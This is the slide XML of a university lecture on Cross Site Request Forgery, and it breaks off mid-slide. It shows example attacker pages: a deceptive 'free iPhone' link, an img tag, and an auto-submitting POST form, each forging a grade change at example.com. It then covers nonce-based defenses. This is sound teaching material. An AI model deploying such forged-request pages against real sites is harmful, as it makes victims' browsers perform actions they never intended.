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6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0" autoAdjust="0"/>
    <p:restoredTop sz="90376" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr>
        <p:scale>
          <a:sx n="94" d="100"/>
          <a:sy n="94" d="100"/>
        </p:scale>
        <p:origin x="-1656" y="-112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0" y="17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1" smtClean="0"/>
              <a:t>Cross Site Request Forgery</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="1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1" smtClean="0"/>
              <a:t>CSE 591 – Security and Vulnerability Analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="1" smtClean="0"/>
              <a:t>Spring 2015</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" noProof="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="1" smtClean="0"/>
              <a:t>Adam Doupé</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" noProof="1" smtClean="0"/>
              <a:t>Arizona State University</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="1" smtClean="0"/>
              <a:t>http://adamdoupe.com</a:t>
            </a:r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10.0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0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Forms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dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;form action="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/grades/submit"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  &lt;input type="text" name="student" value="bar"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  &lt;input type="text" name="class"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  &lt;input type="text" name="grade"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  &lt;input type="submit" name="submit"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;/form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1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lvl="1" indent="0"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0" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/grades/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>submit?student</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Adam+Doupé&amp;class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=cse+591&amp;grade=A%2B&amp;submit=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>                                             </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2015-01-15 at 9.3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0655"/>
            <a:ext cx="629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1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&lt;html&gt;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&lt;head&gt;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&lt;meta charset="UTF-8"&gt;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&lt;title&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> Example&lt;/title&gt;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&lt;/head&gt;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&lt;body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/grades/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>submit?student</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>shadow&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=cse+591&amp;grade=A%2B&amp;submit=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Submit"&gt;Click me for a free iPhone 6!&lt;/a&gt;</a:t>
            </a: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&lt;/body&gt;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&lt;/html&gt;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1717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10.30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10.3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3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Web Application's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requests from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/grades/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>submit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One from the form we showed the user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One from the link the user was tricked on clicking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Two different intentions from the users' perspective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One the user wanted to submit the form (take the action)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One the user was just clicking a link</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Both requests look identical to the application!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59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&lt;meta charset="UTF-8"&gt;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&lt;title</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;Even Worse&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/title&gt;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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>img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=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/grades/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>submit?student</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>shadow&amp;class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=cse+591&amp;grade=A%2B&amp;submit=Submit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"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&lt;/html&gt;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5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have seen, our browser will automatically make the request to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> when it encounters an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> tag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>So we just need to get the user to visit our site (or otherwise load an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> tag that we control the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>src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&lt;form action="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/grades/submit" method="POST"&gt;</a:t>
            </a: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  &lt;input type="text" name="student" value="bar"&gt;</a:t>
            </a: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  &lt;input type="text" name="class"&gt;</a:t>
            </a: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  &lt;input type="text" name="grade"&gt;</a:t>
            </a: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  &lt;input type="submit" name="submit"&gt;</a:t>
            </a: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&lt;/form&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:buNone/>
            </a:pP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POST /grades/submit HTTP/1.1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Host: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>example.com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User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:34.0) Gecko/20100101 Firefox/34.0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Accept: text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>html,application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>xhtml+xml,application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>xml;q</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=0.9,*/*;q=0.8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Accept-Language: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>en-US,en;q</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=0.5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Accept-Encoding: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>gzip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, deflate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Connection: keep-alive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Content-Type: application/x-www-form-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>urlencoded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Content-Length: 68</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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student=Adam+Doup%C3%A9&amp;class=cse+591&amp;grade=A%2B&amp;submit=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Submit+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Query</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Screen Shot 2015-01-15 at 9.5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8" y="3005427"/>
            <a:ext cx="6426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3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to the Rescue?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&lt;meta charset="UTF-8"&gt;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&lt;title</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;Attacker&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/title&gt;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&lt;body</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>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&lt;form action="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/grades/submit" method="POST" id="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>csrf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas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&lt;input type="text" name="student" value="shadow"&gt;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&lt;input type="text" name="class" value="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>cse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> 591"&gt;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&lt;input type="text" name="grade" value="A+"&gt;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  &lt;input type="submit" name="submit"&gt;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&lt;/form&gt;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&lt;script&gt;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err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>HTMLFormElement.prototype.submit.call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document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>csrf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"));	&lt;/script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&lt;/html&gt;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881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&lt;meta charset="UTF-8"&gt;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&lt;title</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> Example&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/title&gt;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&lt;/head</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>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 err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>img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src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>example.com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image.jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>img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="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>www.gravatar.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/avatar/f0a8d601858c94f1cd563e2402eda4d8?s=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>20"&gt;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8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11.3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11.42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0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Request Forgery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attacker can force your browser to make a request to the web application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If there is not guarantee that the user intended to make the request Cross-Site Request Forgery is possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CSRF or XSRF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2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Server-side code must generate a (random and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>unguessable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) nonce, and that nonce must be included in very sensitive (state-changing) request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form action="http:/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example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/grades/submit" method="POST"&gt;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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>input type="text" name="student</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"&gt;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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>input type="text" name="class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>input type="text" name="grade</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas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&lt;input type="hidden" name="nonce" value="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>86265964993938188445</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>"&gt;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&lt;input type="submit" name="submit"&gt;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&lt;/form&gt;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CSRF is subtle but critical vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Using cookies as a session is not enough, also need a nonce for state-changing requests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0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9.57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9.5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4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9.5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9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9.59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the HTTP request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&lt;meta charset="UTF-8"&gt;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&lt;title&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> Example&lt;/title&gt;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&lt;body&gt;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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>img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="https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>www.facebook.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
